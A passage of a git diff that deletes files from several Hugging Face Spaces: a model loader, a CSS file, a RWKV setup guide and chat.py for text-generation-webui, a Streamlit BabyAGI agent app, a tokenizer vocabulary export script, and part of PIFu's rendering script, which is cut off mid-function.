cycle_gan_model.py for an usage. - -Now you can use the model class by specifying flag '--model dummy'. -See our template model class 'template_model.py' for more details. 
-""" - -import importlib -from models.base_model import BaseModel - - -def find_model_using_name(model_name): - """Import the module "models/[model_name]_model.py". - - In the file, the class called DatasetNameModel() will - be instantiated. It has to be a subclass of BaseModel, - and it is case-insensitive. - """ - model_filename = "models." + model_name + "_model" - modellib = importlib.import_module(model_filename) - #print(modellib) - model = None - target_model_name = model_name.replace('_', '') + 'model' - for name, cls in modellib.__dict__.items(): - if name.lower() == target_model_name.lower() \ - and issubclass(cls, BaseModel): - model = cls - - if model is None: - print("In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase." % (model_filename, target_model_name)) - exit(0) - - return model - - -def get_option_setter(model_name): - """Return the static method of the model class.""" - model_class = find_model_using_name(model_name) - return model_class.modify_commandline_options - - -def create_model(config, DDP_device=None): - """Create a model given the option. - - This function warps the class CustomDatasetDataLoader. - This is the main interface between this package and 'train.py'/'test.py' - - Example: - >>> from models import create_model - >>> model = create_model(opt) - """ - model = find_model_using_name(config['common']['model']) - instance = model(config, DDP_device=DDP_device) - print("model [%s] was created" % type(instance).__name__) - return instance diff --git a/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css b/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css deleted file mode 100644 index a10e6397a1a0f5e0fbd98b98d65a572a2290807b..0000000000000000000000000000000000000000 --- a/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css +++ /dev/null @@ -1,25 +0,0 @@ -/* Align the elements for SD_api_picture extension */ -.SDAP #sampler_box { - padding-top: var(--spacing-sm); - padding-bottom: var(--spacing-sm); -} - -.SDAP #seed_box, -.SDAP #cfg_box { - padding-top: var(--spacing-md); -} - -.SDAP #sampler_box span, -.SDAP #seed_box span, -.SDAP #cfg_box span{ - margin-bottom: var(--spacing-sm); -} - -.SDAP svg.dropdown-arrow { - flex-shrink: 0 !important; - margin: 0px !important; -} - -.SDAP .hires_opts input[type="number"] { - width: 6em !important; -} diff --git a/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md b/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md deleted file mode 100644 index 27db3d10ca98faffee7c254a3244405f8cce2793..0000000000000000000000000000000000000000 --- a/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md +++ /dev/null @@ -1,54 +0,0 @@ -> RWKV: RNN with Transformer-level LLM Performance -> -> It combines the best of RNN and transformer - great performance, fast inference, saves VRAM, fast training, "infinite" ctx_len, and free sentence embedding (using the final hidden state). - -https://github.com/BlinkDL/RWKV-LM - -https://github.com/BlinkDL/ChatRWKV - -## Using RWKV in the web UI - -#### 1. 
Download the model - -It is available in different sizes: - -* https://huggingface.co/BlinkDL/rwkv-4-pile-3b/ -* https://huggingface.co/BlinkDL/rwkv-4-pile-7b/ -* https://huggingface.co/BlinkDL/rwkv-4-pile-14b/ - -There are also older releases with smaller sizes like: - -* https://huggingface.co/BlinkDL/rwkv-4-pile-169m/resolve/main/RWKV-4-Pile-169M-20220807-8023.pth - -Download the chosen `.pth` and put it directly in the `models` folder. - -#### 2. Download the tokenizer - -[20B_tokenizer.json](https://raw.githubusercontent.com/BlinkDL/ChatRWKV/main/v2/20B_tokenizer.json) - -Also put it directly in the `models` folder. Make sure to not rename it. It should be called `20B_tokenizer.json`. - -#### 3. Launch the web UI - -No additional steps are required. Just launch it as you would with any other model. - -``` -python server.py --listen --no-stream --model RWKV-4-Pile-169M-20220807-8023.pth -``` - -## Setting a custom strategy - -It is possible to have very fine control over the offloading and precision for the model with the `--rwkv-strategy` flag. Possible values include: - -``` -"cpu fp32" # CPU mode -"cuda fp16" # GPU mode with float16 precision -"cuda fp16 *30 -> cpu fp32" # GPU+CPU offloading. The higher the number after *, the higher the GPU allocation. -"cuda fp16i8" # GPU mode with 8-bit precision -``` - -See the README for the PyPl package for more details: https://pypi.org/project/rwkv/ - -## Compiling the CUDA kernel - -You can compile the CUDA kernel for the model with `--rwkv-cuda-on`. This should improve the performance a lot but I haven't been able to get it to work yet. \ No newline at end of file diff --git a/spaces/dwolfe66/text-generation-webui-space/modules/chat.py b/spaces/dwolfe66/text-generation-webui-space/modules/chat.py deleted file mode 100644 index bd45b879f92f366255c6f2308ccf135dd61bda1d..0000000000000000000000000000000000000000 --- a/spaces/dwolfe66/text-generation-webui-space/modules/chat.py +++ /dev/null @@ -1,398 +0,0 @@ -import base64 -import copy -import io -import json -import re -from datetime import datetime -from pathlib import Path - -from PIL import Image - -import modules.extensions as extensions_module -import modules.shared as shared -from modules.extensions import apply_extensions -from modules.html_generator import generate_chat_html -from modules.text_generation import encode, generate_reply, get_max_prompt_length - - -# This gets the new line characters right. 
-def clean_chat_message(text): - text = text.replace('\n', '\n\n') - text = re.sub(r"\n{3,}", "\n\n", text) - text = text.strip() - return text - -def generate_chat_output(history, name1, name2, character): - if shared.args.cai_chat: - return generate_chat_html(history, name1, name2, character) - else: - return history - -def generate_chat_prompt(user_input, max_new_tokens, name1, name2, context, chat_prompt_size, impersonate=False): - user_input = clean_chat_message(user_input) - rows = [f"{context.strip()}\n"] - - if shared.soft_prompt: - chat_prompt_size -= shared.soft_prompt_tensor.shape[1] - max_length = min(get_max_prompt_length(max_new_tokens), chat_prompt_size) - - i = len(shared.history['internal'])-1 - while i >= 0 and len(encode(''.join(rows), max_new_tokens)[0]) < max_length: - rows.insert(1, f"{name2}: {shared.history['internal'][i][1].strip()}\n") - if not (shared.history['internal'][i][0] == '<|BEGIN-VISIBLE-CHAT|>'): - rows.insert(1, f"{name1}: {shared.history['internal'][i][0].strip()}\n") - i -= 1 - - if not impersonate: - rows.append(f"{name1}: {user_input}\n") - rows.append(apply_extensions(f"{name2}:", "bot_prefix")) - limit = 3 - else: - rows.append(f"{name1}:") - limit = 2 - - while len(rows) > limit and len(encode(''.join(rows), max_new_tokens)[0]) >= max_length: - rows.pop(1) - - prompt = ''.join(rows) - return prompt - -def extract_message_from_reply(question, reply, name1, name2, check, impersonate=False): - next_character_found = False - - asker = name1 if not impersonate else name2 - replier = name2 if not impersonate else name1 - - previous_idx = [m.start() for m in re.finditer(f"(^|\n){re.escape(replier)}:", question)] - idx = [m.start() for m in re.finditer(f"(^|\n){re.escape(replier)}:", reply)] - idx = idx[max(len(previous_idx)-1, 0)] - - if not impersonate: - reply = reply[idx + 1 + len(apply_extensions(f"{replier}:", "bot_prefix")):] - else: - reply = reply[idx + 1 + len(f"{replier}:"):] - - if check: - lines = reply.split('\n') - reply = lines[0].strip() - if len(lines) > 1: - next_character_found = True - else: - idx = reply.find(f"\n{asker}:") - if idx != -1: - reply = reply[:idx] - next_character_found = True - reply = clean_chat_message(reply) - - # If something like "\nYo" is generated just before "\nYou:" - # is completed, trim it - next_turn = f"\n{asker}:" - for j in range(len(next_turn)-1, 0, -1): - if reply[-j:] == next_turn[:j]: - reply = reply[:-j] - break - - return reply, next_character_found - -def stop_everything_event(): - shared.stop_everything = True - -def chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1, regenerate=False): - shared.stop_everything = False - just_started = True - eos_token = '\n' if check else None - name1_original = name1 - if 'pygmalion' in shared.model_name.lower(): - name1 = "You" - - # Check if any extension wants to hijack this function call - visible_text = None - custom_generate_chat_prompt = None - for extension, _ in extensions_module.iterator(): - if hasattr(extension, 'input_hijack') and extension.input_hijack['state'] == True: - extension.input_hijack['state'] = False - text, visible_text = extension.input_hijack['value'] - if custom_generate_chat_prompt is None and hasattr(extension, 'custom_generate_chat_prompt'): - custom_generate_chat_prompt = 
extension.custom_generate_chat_prompt - - if visible_text is None: - visible_text = text - if shared.args.chat: - visible_text = visible_text.replace('\n', '
      ') - text = apply_extensions(text, "input") - - if custom_generate_chat_prompt is None: - prompt = generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size) - else: - prompt = custom_generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size) - - # Yield *Is typing...* - if not regenerate: - yield shared.history['visible']+[[visible_text, shared.processing_message]] - - # Generate - reply = '' - for i in range(chat_generation_attempts): - for reply in generate_reply(f"{prompt}{' ' if len(reply) > 0 else ''}{reply}", max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, eos_token=eos_token, stopping_string=f"\n{name1}:"): - - # Extracting the reply - reply, next_character_found = extract_message_from_reply(prompt, reply, name1, name2, check) - visible_reply = re.sub("(||{{user}})", name1_original, reply) - visible_reply = apply_extensions(visible_reply, "output") - if shared.args.chat: - visible_reply = visible_reply.replace('\n', '
      ') - - # We need this global variable to handle the Stop event, - # otherwise gradio gets confused - if shared.stop_everything: - return shared.history['visible'] - if just_started: - just_started = False - shared.history['internal'].append(['', '']) - shared.history['visible'].append(['', '']) - - shared.history['internal'][-1] = [text, reply] - shared.history['visible'][-1] = [visible_text, visible_reply] - if not shared.args.no_stream: - yield shared.history['visible'] - if next_character_found: - break - - yield shared.history['visible'] - -def impersonate_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - eos_token = '\n' if check else None - - if 'pygmalion' in shared.model_name.lower(): - name1 = "You" - - prompt = generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size, impersonate=True) - - reply = '' - # Yield *Is typing...* - yield shared.processing_message - for i in range(chat_generation_attempts): - for reply in generate_reply(prompt+reply, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, eos_token=eos_token, stopping_string=f"\n{name2}:"): - reply, next_character_found = extract_message_from_reply(prompt, reply, name1, name2, check, impersonate=True) - yield reply - if next_character_found: - break - yield reply - -def cai_chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - for _history in chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts): - yield generate_chat_html(_history, name1, name2, shared.character) - -def regenerate_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - if (shared.character != 'None' and len(shared.history['visible']) == 1) or len(shared.history['internal']) == 0: - yield generate_chat_output(shared.history['visible'], name1, name2, shared.character) - else: - last_visible = shared.history['visible'].pop() - last_internal = shared.history['internal'].pop() - # Yield '*Is typing...*' - yield generate_chat_output(shared.history['visible']+[[last_visible[0], shared.processing_message]], name1, name2, shared.character) - for _history in chatbot_wrapper(last_internal[0], max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts, regenerate=True): - if shared.args.cai_chat: - shared.history['visible'][-1] = [last_visible[0], _history[-1][1]] - else: - shared.history['visible'][-1] = (last_visible[0], _history[-1][1]) - yield 
generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def remove_last_message(name1, name2): - if len(shared.history['visible']) > 0 and not shared.history['internal'][-1][0] == '<|BEGIN-VISIBLE-CHAT|>': - last = shared.history['visible'].pop() - shared.history['internal'].pop() - else: - last = ['', ''] - - if shared.args.cai_chat: - return generate_chat_html(shared.history['visible'], name1, name2, shared.character), last[0] - else: - return shared.history['visible'], last[0] - -def send_last_reply_to_input(): - if len(shared.history['internal']) > 0: - return shared.history['internal'][-1][1] - else: - return '' - -def replace_last_reply(text, name1, name2): - if len(shared.history['visible']) > 0: - if shared.args.cai_chat: - shared.history['visible'][-1][1] = text - else: - shared.history['visible'][-1] = (shared.history['visible'][-1][0], text) - shared.history['internal'][-1][1] = apply_extensions(text, "input") - - return generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def clear_html(): - return generate_chat_html([], "", "", shared.character) - -def clear_chat_log(name1, name2): - if shared.character != 'None': - found = False - for i in range(len(shared.history['internal'])): - if '<|BEGIN-VISIBLE-CHAT|>' in shared.history['internal'][i][0]: - shared.history['visible'] = [['', apply_extensions(shared.history['internal'][i][1], "output")]] - shared.history['internal'] = [shared.history['internal'][i]] - found = True - break - if not found: - shared.history['visible'] = [] - shared.history['internal'] = [] - else: - shared.history['internal'] = [] - shared.history['visible'] = [] - - return generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def redraw_html(name1, name2): - return generate_chat_html(shared.history['visible'], name1, name2, shared.character) - -def tokenize_dialogue(dialogue, name1, name2): - _history = [] - - dialogue = re.sub('', '', dialogue) - dialogue = re.sub('', '', dialogue) - dialogue = re.sub('(\n|^)[Aa]non:', '\\1You:', dialogue) - dialogue = re.sub('(\n|^)\[CHARACTER\]:', f'\\g<1>{name2}:', dialogue) - idx = [m.start() for m in re.finditer(f"(^|\n)({re.escape(name1)}|{re.escape(name2)}):", dialogue)] - if len(idx) == 0: - return _history - - messages = [] - for i in range(len(idx)-1): - messages.append(dialogue[idx[i]:idx[i+1]].strip()) - messages.append(dialogue[idx[-1]:].strip()) - - entry = ['', ''] - for i in messages: - if i.startswith(f'{name1}:'): - entry[0] = i[len(f'{name1}:'):].strip() - elif i.startswith(f'{name2}:'): - entry[1] = i[len(f'{name2}:'):].strip() - if not (len(entry[0]) == 0 and len(entry[1]) == 0): - _history.append(entry) - entry = ['', ''] - - print("\033[1;32;1m\nDialogue tokenized to:\033[0;37;0m\n", end='') - for row in _history: - for column in row: - print("\n") - for line in column.strip().split('\n'): - print("| "+line+"\n") - print("|\n") - print("------------------------------") - - return _history - -def save_history(timestamp=True): - prefix = '' if shared.character == 'None' else f"{shared.character}_" - if timestamp: - fname = f"{prefix}{datetime.now().strftime('%Y%m%d-%H%M%S')}.json" - else: - fname = f"{prefix}persistent.json" - if not Path('logs').exists(): - Path('logs').mkdir() - with open(Path(f'logs/{fname}'), 'w', encoding='utf-8') as f: - f.write(json.dumps({'data': shared.history['internal'], 'data_visible': shared.history['visible']}, indent=2)) - return Path(f'logs/{fname}') - -def load_history(file, name1, 
name2): - file = file.decode('utf-8') - try: - j = json.loads(file) - if 'data' in j: - shared.history['internal'] = j['data'] - if 'data_visible' in j: - shared.history['visible'] = j['data_visible'] - else: - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - # Compatibility with Pygmalion AI's official web UI - elif 'chat' in j: - shared.history['internal'] = [':'.join(x.split(':')[1:]).strip() for x in j['chat']] - if len(j['chat']) > 0 and j['chat'][0].startswith(f'{name2}:'): - shared.history['internal'] = [['<|BEGIN-VISIBLE-CHAT|>', shared.history['internal'][0]]] + [[shared.history['internal'][i], shared.history['internal'][i+1]] for i in range(1, len(shared.history['internal'])-1, 2)] - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - shared.history['visible'][0][0] = '' - else: - shared.history['internal'] = [[shared.history['internal'][i], shared.history['internal'][i+1]] for i in range(0, len(shared.history['internal'])-1, 2)] - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - except: - shared.history['internal'] = tokenize_dialogue(file, name1, name2) - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - -def load_default_history(name1, name2): - if Path('logs/persistent.json').exists(): - load_history(open(Path('logs/persistent.json'), 'rb').read(), name1, name2) - else: - shared.history['internal'] = [] - shared.history['visible'] = [] - -def load_character(_character, name1, name2): - context = "" - shared.history['internal'] = [] - shared.history['visible'] = [] - if _character != 'None': - shared.character = _character - data = json.loads(open(Path(f'characters/{_character}.json'), 'r', encoding='utf-8').read()) - name2 = data['char_name'] - if 'char_persona' in data and data['char_persona'] != '': - context += f"{data['char_name']}'s Persona: {data['char_persona']}\n" - if 'world_scenario' in data and data['world_scenario'] != '': - context += f"Scenario: {data['world_scenario']}\n" - context = f"{context.strip()}\n\n" - if 'example_dialogue' in data and data['example_dialogue'] != '': - data['example_dialogue'] = data['example_dialogue'].replace('{{user}}', name1).replace('{{char}}', name2) - data['example_dialogue'] = data['example_dialogue'].replace('', name1).replace('', name2) - context += f"{data['example_dialogue'].strip()}\n" - if 'char_greeting' in data and len(data['char_greeting'].strip()) > 0: - shared.history['internal'] += [['<|BEGIN-VISIBLE-CHAT|>', data['char_greeting']]] - shared.history['visible'] += [['', apply_extensions(data['char_greeting'], "output")]] - else: - shared.history['internal'] += [['<|BEGIN-VISIBLE-CHAT|>', "Hello there!"]] - shared.history['visible'] += [['', "Hello there!"]] - else: - shared.character = None - context = shared.settings['context_pygmalion'] - name2 = shared.settings['name2_pygmalion'] - - if Path(f'logs/{shared.character}_persistent.json').exists(): - load_history(open(Path(f'logs/{shared.character}_persistent.json'), 'rb').read(), name1, name2) - - if shared.args.cai_chat: - return name2, context, generate_chat_html(shared.history['visible'], name1, name2, shared.character) - else: - return name2, context, shared.history['visible'] - -def upload_character(json_file, img, tavern=False): - json_file = json_file if type(json_file) == str else json_file.decode('utf-8') - data = json.loads(json_file) - outfile_name = data["char_name"] - i = 1 - while Path(f'characters/{outfile_name}.json').exists(): - outfile_name = 
f'{data["char_name"]}_{i:03d}' - i += 1 - if tavern: - outfile_name = f'TavernAI-{outfile_name}' - with open(Path(f'characters/{outfile_name}.json'), 'w', encoding='utf-8') as f: - f.write(json_file) - if img is not None: - img = Image.open(io.BytesIO(img)) - img.save(Path(f'characters/{outfile_name}.png')) - print(f'New character saved to "characters/{outfile_name}.json".') - return outfile_name - -def upload_tavern_character(img, name1, name2): - _img = Image.open(io.BytesIO(img)) - _img.getexif() - decoded_string = base64.b64decode(_img.info['chara']) - _json = json.loads(decoded_string) - _json = {"char_name": _json['name'], "char_persona": _json['description'], "char_greeting": _json["first_mes"], "example_dialogue": _json['mes_example'], "world_scenario": _json['scenario']} - return upload_character(json.dumps(_json), img, tavern=True) - -def upload_your_profile_picture(img): - img = Image.open(io.BytesIO(img)) - img.save(Path('img_me.png')) - print('Profile picture saved to "img_me.png"') diff --git a/spaces/eaglelandsonce/BabyAGI/app.py b/spaces/eaglelandsonce/BabyAGI/app.py deleted file mode 100644 index 709b22fcccb0c1f7adc0c759877e566ce18a618e..0000000000000000000000000000000000000000 --- a/spaces/eaglelandsonce/BabyAGI/app.py +++ /dev/null @@ -1,265 +0,0 @@ -# imports -import streamlit as st -from PIL import Image -from actors import TaskCreationChain, TaskPrioritizationChain -import os -from collections import deque -from typing import Dict, List, Optional, Any - -from langchain import LLMChain, OpenAI, PromptTemplate -from langchain.embeddings import OpenAIEmbeddings -from langchain.llms import BaseLLM -from langchain.vectorstores.base import VectorStore -from pydantic import BaseModel, Field -from langchain.chains.base import Chain - -from langchain.vectorstores import FAISS -from langchain.docstore import InMemoryDocstore - -# Sidebar inputs for API keys -st.sidebar.header('API Keys') -openai_api_key = st.sidebar.text_input('OpenAI API Key', type="password") -serpapi_api_key = st.sidebar.text_input('SERPAPI API Key', type="password") - - -# implement the FAISS Vector database -if openai_api_key and serpapi_api_key: - os.environ["OPENAI_API_KEY"] = openai_api_key - os.environ["SERPAPI_API_KEY"] = serpapi_api_key - - # Define your embedding model - embeddings_model = OpenAIEmbeddings() - - # Initialize the vectorstore as empty - import faiss - embedding_size = 1536 - index = faiss.IndexFlatL2(embedding_size) - vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {}) - - # With Tools (Execution) - - from langchain.agents import ZeroShotAgent, Tool, AgentExecutor - from langchain import OpenAI, SerpAPIWrapper, LLMChain - todo_prompt = PromptTemplate.from_template("You are a planner who is an expert at coming up with a todo list for a given objective. Come up with a todo list for this objective: {objective}") - todo_chain = LLMChain(llm=OpenAI(temperature=0), prompt=todo_prompt) - search = SerpAPIWrapper() - tools = [ - Tool( - name = "Search", - func=search.run, - description="useful for when you need to answer questions about current events" - ), - Tool( - name = "TODO", - func=todo_chain.run, - description="useful for when you need to come up with todo lists. Input: an objective to create a todo list for. Output: a todo list for that objective. Please be very clear what the objective is!" - ) - ] - - - prefix = """You are an AI who performs one task based on the following objective: {objective}. 
Take into account these previously completed tasks: {context}.""" - suffix = """Question: {task} - {agent_scratchpad}""" - prompt = ZeroShotAgent.create_prompt( - tools, - prefix=prefix, - suffix=suffix, - input_variables=["objective", "task", "context","agent_scratchpad"] - ) - - - # Baby AGI Controller - - def get_next_task(task_creation_chain: LLMChain, result: Dict, task_description: str, task_list: List[str], objective: str) -> List[Dict]: - """Get the next task.""" - incomplete_tasks = ", ".join(task_list) - response = task_creation_chain.run(result=result, task_description=task_description, incomplete_tasks=incomplete_tasks, objective=objective) - new_tasks = response.split('\n') - return [{"task_name": task_name} for task_name in new_tasks if task_name.strip()] - - #prioritization loop - - def prioritize_tasks(task_prioritization_chain: LLMChain, this_task_id: int, task_list: List[Dict], objective: str) -> List[Dict]: - """Prioritize tasks.""" - task_names = [t["task_name"] for t in task_list] - next_task_id = int(this_task_id) + 1 - response = task_prioritization_chain.run(task_names=task_names, - next_task_id=next_task_id, - objective=objective) - new_tasks = response.split('\n') - prioritized_task_list = [] - for task_string in new_tasks: - if not task_string.strip(): - continue - task_parts = task_string.strip().split(".", 1) - if len(task_parts) == 2: - task_id = task_parts[0].strip() - task_name = task_parts[1].strip() - prioritized_task_list.append({"task_id": task_id, "task_name": task_name}) - return prioritized_task_list - - def _get_top_tasks(vectorstore, query: str, k: int) -> List[str]: - """Get the top k tasks based on the query.""" - results = vectorstore.similarity_search_with_score(query, k=k) - if not results: - return [] - sorted_results, _ = zip(*sorted(results, key=lambda x: x[1], reverse=True)) - return [str(item.metadata['task']) for item in sorted_results] - - def execute_task(vectorstore, execution_chain: LLMChain, objective: str, task: str, k: int = 5) -> str: - """Execute a task.""" - context = _get_top_tasks(vectorstore, query=objective, k=k) - return execution_chain.run(objective=objective, context=context, task=task) - - - # Modify BabyAGI class to print results using Streamlit functions - class BabyAGI(Chain, BaseModel): - """Controller model for the BabyAGI agent.""" - - task_list: deque = Field(default_factory=deque) - task_creation_chain: TaskCreationChain = Field(...) - task_prioritization_chain: TaskPrioritizationChain = Field(...) - execution_chain: AgentExecutor = Field(...) 
- task_id_counter: int = Field(1) - vectorstore: VectorStore = Field(init=False) - max_iterations: Optional[int] = None - - class Config: - """Configuration for this pydantic object.""" - arbitrary_types_allowed = True - - def add_task(self, task: Dict): - self.task_list.append(task) - - def print_task_list(self): - st.write("\n*****TASK LIST*****\n") - for t in self.task_list: - st.write(f'{t["task_id"]}: {t["task_name"]}') - - def print_next_task(self, task: Dict): - st.write("\n*****NEXT TASK*****\n") - st.write(f'{task["task_id"]}: {task["task_name"]}') # fixed variable t to task - - def print_task_result(self, result: str): - st.write("\n*****TASK RESULT*****\n") - st.write(result) - - - @property - def input_keys(self) -> List[str]: - return ["objective"] - - @property - def output_keys(self) -> List[str]: - return [] - - # running the actual agent with a while loop - - def _call(self, inputs: Dict[str, Any]) -> Dict[str, Any]: - """Run the agent.""" - objective = inputs['objective'] - first_task = inputs.get("first_task", "Make a todo list") - self.add_task({"task_id": 1, "task_name": first_task}) - num_iters = 0 - - # interate until done - while True: - if self.task_list: - self.print_task_list() - - # Step 1: Pull the first task - task = self.task_list.popleft() - self.print_next_task(task) - - # Step 2: Execute the task - result = execute_task( - self.vectorstore, self.execution_chain, objective, task["task_name"] - ) - this_task_id = int(task["task_id"]) - self.print_task_result(result) - - # Step 3: Store the result locally in FAISS vector database - result_id = f"result_{task['task_id']}" - self.vectorstore.add_texts( - texts=[result], - metadatas=[{"task": task["task_name"]}], - ids=[result_id], - ) - - # Step 4: Create new tasks and reprioritize task list - new_tasks = get_next_task( - self.task_creation_chain, result, task["task_name"], [t["task_name"] for t in self.task_list], objective - ) - for new_task in new_tasks: - self.task_id_counter += 1 - new_task.update({"task_id": self.task_id_counter}) - self.add_task(new_task) - self.task_list = deque( - prioritize_tasks( - self.task_prioritization_chain, this_task_id, list(self.task_list), objective - ) - ) - num_iters += 1 - if self.max_iterations is not None and num_iters == self.max_iterations: - print("\033[91m\033[1m" + "\n*****TASK ENDING*****\n" + "\033[0m\033[0m") - break - return {} - - @classmethod - def from_llm( - cls, - llm: BaseLLM, - vectorstore: VectorStore, - verbose: bool = False, - **kwargs - ) -> "BabyAGI": - """Initialize the BabyAGI Controller.""" - task_creation_chain = TaskCreationChain.from_llm( - llm, verbose=verbose - ) - task_prioritization_chain = TaskPrioritizationChain.from_llm( - llm, verbose=verbose - ) - llm_chain = LLMChain(llm=llm, prompt=prompt) - tool_names = [tool.name for tool in tools] - agent = ZeroShotAgent(llm_chain=llm_chain, allowed_tools=tool_names) - agent_executor = AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True) - return cls( - task_creation_chain=task_creation_chain, - task_prioritization_chain=task_prioritization_chain, - execution_chain=agent_executor, - vectorstore=vectorstore, - **kwargs - ) - - # Streamlit interface - - st.title('BabyAGI') - - # Input for objective and max iterations - objective = st.text_area("Enter the objective:", "Give a non-military solution that President Biden could use to solve the war in Ukraine minimizing loss of life, allowing for the global distribution of grain and increasing stability of nuclear facilities") - 
max_iterations = st.slider("Max Iterations", 1, 10, 3) - - - # Button to run the code - if st.button('Run'): - # BabyAGI Initialization and execution - llm = OpenAI(temperature=0) - verbose = False - baby_agi = BabyAGI.from_llm( - llm=llm, - vectorstore=vectorstore, - verbose=verbose, - max_iterations=max_iterations - ) - baby_agi({"objective": objective}) - - -else: - st.title('BabyAGI') - st.error("Please provide both the OpenAI and SERPAPI API keys to proceed.") - st.image("./babyai.png") - st.markdown('''Learn more join https://www.meetup.com/florence-aws-user-group-meetup/''') - - - diff --git a/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py b/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py deleted file mode 100644 index 2dc413c1a23466f591e62232796d853aee47ee0a..0000000000000000000000000000000000000000 --- a/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py +++ /dev/null @@ -1,15 +0,0 @@ -import json - -from tokenizers import Tokenizer - -tokenizer = Tokenizer.from_file("20B_tokenizer.json") - -vocab = tokenizer.get_vocab() - -sorted_vocab = sorted(vocab.items(), key=lambda kv:kv[1]) - -f_out = open("20B_tokenizer.txt", "w", encoding="utf-8") -for token, idx in sorted_vocab: - decoded_token = tokenizer.decode([idx]) - f_out.write(json.dumps({"id": idx, "token": token, "token_decode": decoded_token}) + "\t" + token + "\t" + decoded_token + "\n") - diff --git a/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py b/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py deleted file mode 100644 index 563c03fba6e304eced73ca283152a968a65c3b8e..0000000000000000000000000000000000000000 --- a/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py +++ /dev/null @@ -1,290 +0,0 @@ -#from data.config import raw_dataset, render_dataset, archive_dataset, model_list, zip_path - -from lib.renderer.camera import Camera -import numpy as np -from lib.renderer.mesh import load_obj_mesh, compute_tangent, compute_normal, load_obj_mesh_mtl -from lib.renderer.camera import Camera -import os -import cv2 -import time -import math -import random -import pyexr -import argparse -from tqdm import tqdm - - -def make_rotate(rx, ry, rz): - sinX = np.sin(rx) - sinY = np.sin(ry) - sinZ = np.sin(rz) - - cosX = np.cos(rx) - cosY = np.cos(ry) - cosZ = np.cos(rz) - - Rx = np.zeros((3,3)) - Rx[0, 0] = 1.0 - Rx[1, 1] = cosX - Rx[1, 2] = -sinX - Rx[2, 1] = sinX - Rx[2, 2] = cosX - - Ry = np.zeros((3,3)) - Ry[0, 0] = cosY - Ry[0, 2] = sinY - Ry[1, 1] = 1.0 - Ry[2, 0] = -sinY - Ry[2, 2] = cosY - - Rz = np.zeros((3,3)) - Rz[0, 0] = cosZ - Rz[0, 1] = -sinZ - Rz[1, 0] = sinZ - Rz[1, 1] = cosZ - Rz[2, 2] = 1.0 - - R = np.matmul(np.matmul(Rz,Ry),Rx) - return R - -def rotateSH(SH, R): - SHn = SH - - # 1st order - SHn[1] = R[1,1]*SH[1] - R[1,2]*SH[2] + R[1,0]*SH[3] - SHn[2] = -R[2,1]*SH[1] + R[2,2]*SH[2] - R[2,0]*SH[3] - SHn[3] = R[0,1]*SH[1] - R[0,2]*SH[2] + R[0,0]*SH[3] - - # 2nd order - SHn[4:,0] = rotateBand2(SH[4:,0],R) - SHn[4:,1] = rotateBand2(SH[4:,1],R) - SHn[4:,2] = rotateBand2(SH[4:,2],R) - - return SHn - -def rotateBand2(x, R): - s_c3 = 0.94617469575 - s_c4 = -0.31539156525 - s_c5 = 0.54627421529 - - s_c_scale = 1.0/0.91529123286551084 - s_c_scale_inv = 0.91529123286551084 - - s_rc2 = 1.5853309190550713*s_c_scale - s_c4_div_c3 = s_c4/s_c3 - s_c4_div_c3_x2 = (s_c4/s_c3)*2.0 - - s_scale_dst2 = s_c3 * s_c_scale_inv - s_scale_dst4 = s_c5 * s_c_scale_inv - - sh0 = x[3] + x[4] + x[4] - x[1] - sh1 = x[0] + s_rc2*x[2] + x[3] + x[4] 
